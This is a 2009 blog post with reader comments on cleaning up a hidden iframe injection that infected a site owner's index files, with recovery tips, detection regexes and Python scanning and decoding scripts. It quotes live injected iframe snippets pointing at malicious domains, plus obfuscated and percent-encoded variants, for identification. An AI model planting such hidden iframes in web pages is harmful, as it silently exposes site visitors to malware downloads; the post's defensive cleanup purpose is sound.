Hidden iframe injection attacks

Mar 20 2009

[Updated on October 27, 2009 with a new version of the script]

It is a shame that after all those posts about security, some of my websites were under attack today.

Shoban and Anand emailed me about this this morning (thanks, guys), and I tried to understand what was going on. To my utter disbelief, more than 10 websites hosted on the same server were affected by the attack.

All the index.* files on the server were infected with a piece of code that loaded a hidden iframe in the page.

To the HTML pages the following piece of code was added:

<iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

To PHP pages it added:

echo "<iframe src=\"http://goooogleadsence.biz/?click=8F9DA\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Asha took the effort and cleaned most of the infected files. We are monitoring the status now.

How did the worm inject the hidden iframes to my files?

There are two ways through which the worm is believed to infect your files:

1) Server is compromised

This is the most common way. Some of the websites residing on the same web server as your website may be compromised (or it may be some vulnerability in your web application itself), which leads to the web server itself being compromised. Once the server is compromised, the worm spreads to all the websites on that server.

2) Client-side FTP

The worm resides on one of the client-side PCs you use to access the FTP or control panel accounts of your hosting server.

When you type in the username and password for the FTP/control panel account, the worm silently reads the credentials, logs in to your FTP account and infects the files on the server. It adds the above-mentioned code to all index.* files.

How can I recover from a hidden iframe injection attack?

Here are a few tips that might help you:

  1. The first thing to do to prevent these kinds of attacks is to change your FTP, control panel and database passwords as soon as possible.
  2. Notify your web host about the attack and advise them to take measures against a possible server-wide attack.
  3. Tighten the file permissions on your server as far as possible.
  4. Download all your files from the server and check them for infections. Clean the infected files.
  5. Using good antivirus software, scan and clean every PC you use for logging in to your hosting server.
  6. Never use public computers to access your server.

How do I clean infected files?

Use these regular expressions to search for all pages containing the malicious code and replace it with a space:

<iframe src=\"http://[^"]*\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>

echo \"<iframe src=\\\"http://[^"]*\\\" width=1 height=1 style=\\\"visibility:hidden;position:absolute\\\"></iframe>\";

You may have to write a script to automate this for all the files on the server.

I have cooked up a PHP script that can help you find the infected files. Download the file from here, save it as clean.php (it is currently named clean.php.txt) and upload it to the root folder of your website.

You may want to change some hardcoded values inside the file.

Then visit the url:

http://www.yourdomain.com/clean.php?c=iframe

The parameter c specifies the text to search for inside the files. The results will look something like this:

[Screenshot: Clean hidden iframes]

It searches all the files in your website and, if any file contains the given string, prints the filename along with the number of occurrences of the string. In the above screenshot, you can see that one file is infected.

Note that the script will not remove the iframes from your files, because automated cleaning could break some of your websites. For now you will have to clean the files manually.
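As an added example (not the post's clean.php), here is a Python scanner that does what the regular expressions and the script above describe: it applies the two patterns, with plain ASCII quotes and the PHP form's backslash-escaped quotes, to every file under a downloaded copy of the site, reports each infected file with its hit count, and offers a replace-with-space cleaning step to review by hand. The sample site it writes, including the domain malicious.example, is constructed for the demo.

```python
"""Scan a downloaded site copy for the injected hidden iframe. Added example, not
the post's clean.php: it uses the two regexes above (ASCII quotes; the PHP form
has its quotes backslash-escaped) and works on constructed sample files."""
import os
import re
import tempfile
# The post's two patterns: HTML form, then the PHP echo form with \" escapes.
HTML_IFRAME = re.compile(r'<iframe src="http://[^"]*" width=1 height=1 '
                         r'style="visibility:hidden;position:absolute"></iframe>')
PHP_IFRAME = re.compile(r'echo "<iframe src=\\"http://[^"]*\\" width=1 height=1 '
                        r'style=\\"visibility:hidden;position:absolute\\"></iframe>";')
PATTERNS = (HTML_IFRAME, PHP_IFRAME)

def count_infections(text):
    """Number of injected snippets (either form) in the text."""
    return sum(len(p.findall(text)) for p in PATTERNS)

def scan_tree(root):
    """Walk every file under root; return {relative path: hit count} for infected files."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as f:
                n = count_infections(f.read())
            if n:
                hits[os.path.relpath(path, root)] = n
    return hits

def clean_text(text):
    """Replace each snippet with a space (the post's advice); diff before uploading."""
    for p in PATTERNS:
        text = p.sub(" ", text)
    return text

# Constructed sample content with a placeholder domain, not real injected code.
SAMPLE_HTML = ('<html><body>Hello<iframe src="http://malicious.example/?click=1234" '
               'width=1 height=1 style="visibility:hidden;position:absolute"></iframe></body></html>')
SAMPLE_PHP = ('<?php echo "<iframe src=\\"http://malicious.example/?click=1234\\" width=1 '
              'height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>"; ?>')

def make_sample_site():
    """Write index.html and blog/index.php (infected) plus style.css (clean); return root."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "blog"))
    for rel, body in (("index.html", SAMPLE_HTML), ("blog/index.php", SAMPLE_PHP), ("style.css", "body{}")):
        with open(os.path.join(root, rel), "w", encoding="utf-8") as f:
            f.write(body)
    return root
```

Running `scan_tree(make_sample_site())` returns the two infected files with one hit each; point `scan_tree` at the folder you downloaded in step 4 to check a real site.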

Faiz has written an advanced ASP.Net script for finding the infected files, and it can be found here.

Will my search engine rankings be affected by this attack?

Try to be fast with these steps, because if a visitor sees the message "This site may harm your computer" pop up when trying to access your website/blog, (s)he may not return again. Remember that if the security of your website is compromised, it can affect the search engine rankings of the website. Besides, it may pave the way for more sophisticated attacks.

Google will mark your site in its search results with a warning: "This site may harm your computer".

Use the following link to see what Google thinks about your website (give the URL of your site instead of shopfloorbd.co.uk):

http://www.google.com/safebrowsing/diagnostic?site=http://shopfloorbd.co.uk

As mentioned above, you must remove the malware from your local machine using antivirus software. AVG detects it as "Trojan Horse Downloader" and NOD32 as "JS/Kryptik.B trojan".

Note that when visiting an infected site, some antivirus software warns you that "Trojan Horse Downloader", an exe file, is trying to load. Once the exe infects your machine, it will infect your server too.

Here are some more code samples caught from the wild:

<iframe src="http://hostverify.net/?click=2730375" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

<iframe src="http://hosttracker.net/?click=32431937" width=1 height=1 style="visibility:hidden;position:absolute">

There are obfuscated versions of the attack code too:

<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){…  etc.

Here is a list of some other websites that host malicious content:


If you find any of those URLs in the code of your website, that is a sure sign that you are infected.

83 responses so far

  • Web Host says:

    Hi

    I see code injections with encrypted JavaScript like the following.

    "document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%6

    Clean up any such code that was not inserted by you in your site code. Use some decryption sites or applications to see the actual link.
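As an added example (not code from the post or from the commenter above), this Python snippet decodes the percent-encoded `document.write(unescape("..."))` form of the injection so the hidden link can be read without executing the script. The page it scans, including the domain malicious.example, is constructed for the demo.

```python
"""Decode document.write(unescape("%..")) injections to read the hidden iframe.
Added example, not code from the post or the comment. JavaScript's unescape()
turns %XX and %uXXXX back into characters; js_unescape() does the same so the
payload can be inspected without running it. The sample page is constructed."""
import re

UNESCAPE_CALL = re.compile(r'document\.write\(unescape\(\s*["\']([^"\']*)["\']\s*\)\)')
HIDDEN_IFRAME = re.compile(r'<iframe[^>]*(?:visibility:\s*hidden|width=["\']?[01]\b)[^>]*>',
                           re.I)

def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX first, then %XX; other text unchanged."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r'%([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)

def js_escape(s):
    """Percent-encode every character as %XX, the shape seen in the comment above;
    only used here to build the constructed sample."""
    return "".join("%%%02x" % ord(c) for c in s)

def find_encoded_iframes(page):
    """Return (decoded payload, src URL or None) for each unescape() call whose
    decoded output contains a hidden iframe; other unescape() calls are skipped."""
    found = []
    for m in UNESCAPE_CALL.finditer(page):
        decoded = js_unescape(m.group(1))
        if HIDDEN_IFRAME.search(decoded):
            src = re.search(r'src=["\']?([^"\'\s>]+)', decoded, re.I)
            found.append((decoded, src.group(1) if src else None))
    return found

# Constructed sample page (placeholder domain): one benign script, one injected one.
PAYLOAD = ('<iframe src="http://malicious.example/?click=1234" width=1 height=1 '
           'style="visibility:hidden;position:absolute"></iframe>')
SAMPLE_PAGE = ('<script>var counter = 1;</script>\n'
               '<script>document.write(unescape("' + js_escape(PAYLOAD) + '"))</script>')

if __name__ == "__main__":
    for decoded, src in find_encoded_iframes(SAMPLE_PAGE):
        print("hidden iframe loads", src)
        print(decoded)
```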

  • Air2air says:

    I want to really thank you for your post here about the issue. It completely took down our site just days before a very important VC meeting. Without the excellent writeup you posted about this issue we would have been sunk. Your writing was clear, the problem was well described and your clean.php file worked great. Kudos!!!!!

  • Hari K T says:

    Wow, cool man.
    Thanks that my server admin does a great job. So my site is not affected. :)

  • Hi,
    very helpful article. Add to the malicious site list this: http://asfirey.net/?click=FA62A

  • kym says:

    yes, big kudos, how frustrating
    as if there isn't already enough to do rather than spend days fighting this thing
    had nearly 100 sites affected
    will check the clean script out and the other one and post back here how it goes

  • [...] and others providing blogging solutions, in all evenhandedness I’m extending this gesture; kindly [Click to view] the blog. I can be reached if not well [...]

  • sudharsan says:

    really useful info that you have given in this article
    thank you very much…
    but I'm in doubt
    I'm using AdSense; will your script that you have cooked
    [ clean.php.txt ] affect my earnings through AdSense?
    please mail me
    please, I want a reply…..

  • [...] i started searching on the net and found some interesting information on the blog of Niyaz PK. I followed his intructions step by step and hopefully everything is back to normal now. I have [...]

  • My website was also hit by this trojan a while ago. I checked Google Safe Browsing and it turns out the network where my hosting is located has indeed been infected. I have already reported it to the hosting provider. I may be forced to use the regular expressions taught here for the sake of security.

    Thanks for the information.

  • Don says:

    We had to battle an iframe attack a few months ago and it is right that this is not a server issue. The first time it happened we turned the site off to the public and cleaned all of the infected pages, uploaded, and we were good for about 8 hours; then it happened again. So this time we ran Avast, which had already been running on the computers since new, and it found nothing, so again we re-uploaded all of the cleaned files and bam, again it shows up. Now we were getting pissed, so on advice from another developer we tried Malwarebytes and there they were: multiple malware found on the computer. So we used Malwarebytes to deal with what it found and we went out and got Norton for all computers that access our FTP servers and have not had a problem since. We also did change the passwords for the site each time we were attacked. So in summary, do not be cheap with antivirus software; it cost us hours and hours of time and a couple of site downtimes that could have been prevented by just having adequate antivirus in the first place.

  • Mike Yan says:

    We also found malware using Malwarebytes, which may have been how some of our client websites had been compromised through FTP access, leaving us with a trail of iframe-infected index files.
    We have since blocked all FTP access and set up the Plesk firewall to only allow safe IP addresses that we have gathered from the known clients that use FTP.
    Two days now and we have had no trouble.
    What a nuisance.

  • Thanks for the informative post, and thanks those who commented with more info.

    I’m running on a major US web host, and just suffered this very issue.

    I’m in the process of documenting new FTP usage policies for accessing production hosting servers. Are there any other precautions that should be taken, besides those here?

  • Dear Sir,

    I read over your blog and thank you, I found a lot of issues from this hidden iframe. It just started to attack both my music sites and server recently, and well, I am having hell trying to remove everything since the sites are so big. Can you contact me personally? Possibly I can pay you to secure my system?

    Matthew Nalett
    admin@newmusicpromote.com

    PS : Only the admin of this blog who posted this tutorial please email me thank you.

  • satish kumar says:

    I have tried to run the script in the root directory but avast tells me to abort the connection.
    Should I ignore avast and let the page load?

  • [...] of the attack. You should also change your password for your site immediately. There are various sites on how to recover files and clean up your [...]

  • Royal Art says:

    I know how to find & clean the infected files on your site.
    If you are interested – icq 274314 one one 8

  • Dheeraj says:

    Is there a way by which I can search all the files??????????
    not only the specified files with the given file name but all the files!!

    can you??? please

  • Niyaz PK says:

    Dheeraj,

    I have modified the script. It now searches all the files. Beware that it will search all files, including CSS, JS, images, etc., so if you have very large files the search will be slow.

  • Dheeraj says:

    thanks a lot!!!! your script has saved me!! thank you!
